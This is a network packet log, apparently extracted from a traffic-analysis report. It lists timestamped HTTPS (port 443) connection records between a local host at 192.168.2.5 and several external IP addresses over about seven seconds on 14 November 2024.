                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.030456066 CET4434999213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.030503035 CET4434999213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.030514956 CET49992443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.030549049 CET49992443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.035103083 CET49992443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.035123110 CET4434999213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.035131931 CET49992443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.035135984 CET4434999213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.042082071 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.042174101 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.042263031 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.042510033 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.042541027 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.345634937 CET44349988116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.345724106 CET44349988116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.345815897 CET49988443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.381011009 CET49988443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.381043911 CET44349988116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.538377047 CET4435000013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.541552067 CET4435000213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.543684006 CET50000443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.543771029 CET4435000013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.544080019 CET50000443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.544094086 CET4435000013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.544627905 CET50002443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.544644117 CET4435000213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.544995070 CET50002443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.545006990 CET4435000213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.552690029 CET4435000113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.553252935 CET50001443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.553272009 CET4435000113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.553612947 CET50001443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.553617001 CET4435000113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.613248110 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.613306999 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.613718033 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.613724947 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.615756035 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.615768909 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.615802050 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.615818024 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.615930080 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.615946054 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.616000891 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.616012096 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.616143942 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.616153002 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.634536982 CET4435000313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.635562897 CET50003443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.635582924 CET4435000313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.635986090 CET50003443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.635992050 CET4435000313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.668797970 CET4435000013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.668948889 CET4435000013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.669085979 CET50000443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.671190023 CET4435000213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.671293020 CET4435000213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.671420097 CET50002443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.686116934 CET4435000113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.686239004 CET4435000113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.687031031 CET50001443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.709628105 CET50000443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.709661007 CET4435000013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.709678888 CET50000443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.709686995 CET4435000013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.713618040 CET50002443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.713624954 CET4435000213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.713641882 CET50002443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.713646889 CET4435000213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.723088026 CET50001443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.723119974 CET4435000113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.723170042 CET50001443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.723176956 CET4435000113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.725788116 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.725857019 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.725984097 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.726990938 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.727029085 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.727082968 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.727531910 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.727569103 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.727746010 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.727762938 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.729371071 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.729454041 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.729520082 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.729783058 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.729814053 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.765621901 CET4435000313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.765702009 CET4435000313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.765830994 CET50003443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.765937090 CET50003443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.765955925 CET4435000313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.765964985 CET50003443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.765969038 CET4435000313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.768742085 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.768779993 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.768852949 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.768965960 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.768978119 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.783843994 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.785553932 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.785595894 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.786011934 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.786027908 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.904017925 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.904064894 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.904162884 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.904618025 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.904629946 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915213108 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915287018 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915429115 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915436029 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915505886 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915549040 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915549040 CET50004443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915592909 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:08.915621996 CET4435000413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.452013969 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.452013969 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.452112913 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.454031944 CET50011443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.454062939 CET4435001123.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.454129934 CET50011443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.466869116 CET50011443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.466892004 CET4435001123.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.469074011 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.469474077 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.469491959 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.469958067 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.469964981 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.471033096 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.471431017 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.471491098 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.471813917 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.471827984 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.477293015 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.477596045 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.477622986 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.479221106 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.479229927 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.498377085 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.498670101 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.498733044 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.499010086 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.499022961 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.598822117 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.598973036 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.599150896 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.599220991 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.599251986 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.599282026 CET50008443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.599296093 CET4435000813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.601531029 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.601594925 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.601779938 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.601867914 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.601867914 CET50006443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.601910114 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.601943970 CET4435000613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.609699011 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.609772921 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.609850883 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.610070944 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.610070944 CET50007443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.610094070 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.610105991 CET4435000713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.631691933 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.632596970 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.632718086 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.632718086 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.632924080 CET50009443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.632936954 CET4435000913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.773499012 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.773825884 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.774081945 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.774090052 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.775610924 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.775618076 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.775713921 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.775732040 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.775912046 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.775933981 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776107073 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776146889 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776277065 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776302099 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776319027 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776331902 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776362896 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.776376009 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.922879934 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.922993898 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.923011065 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.923037052 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.923059940 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.923398018 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.923866034 CET49999443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:09.923883915 CET44349999116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:10.149442911 CET4435001123.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:10.149545908 CET50011443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:10.909753084 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:10.909848928 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:10.909930944 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:10.910242081 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:10.910263062 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.355698109 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.355747938 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.355765104 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.355839014 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.355880022 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.356597900 CET50010443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.356615067 CET44350010116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.356636047 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.356725931 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.357331038 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.357352018 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.363755941 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:12.363770008 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.661387920 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.661465883 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.661560059 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.661560059 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.825735092 CET50012443192.168.2.5116.203.0.159
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.825810909 CET44350012116.203.0.159192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.974946976 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.975029945 CET4435001694.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.975101948 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.985610008 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:13.985646963 CET4435001694.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.063191891 CET4435001694.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.107577085 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.164707899 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.164721966 CET4435001694.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.168273926 CET4435001694.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.168334961 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.324982882 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.325166941 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.325344086 CET4435001694.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.364787102 CET50016443192.168.2.594.245.104.56
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.364804983 CET4435001694.245.104.56192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:26:15.411470890 CET50016443192.168.2.594.245.104.56
